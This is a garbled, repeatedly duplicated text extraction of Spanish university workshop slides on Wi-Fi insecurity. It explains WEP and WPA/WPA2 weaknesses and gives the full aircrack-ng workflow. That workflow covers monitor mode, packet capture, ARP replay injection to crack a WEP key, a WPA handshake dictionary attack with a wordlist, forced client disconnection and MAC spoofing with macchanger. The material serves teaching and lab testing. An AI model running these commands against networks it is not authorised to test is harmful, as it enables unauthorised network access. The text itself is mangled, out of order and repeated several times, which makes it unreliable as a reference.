httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
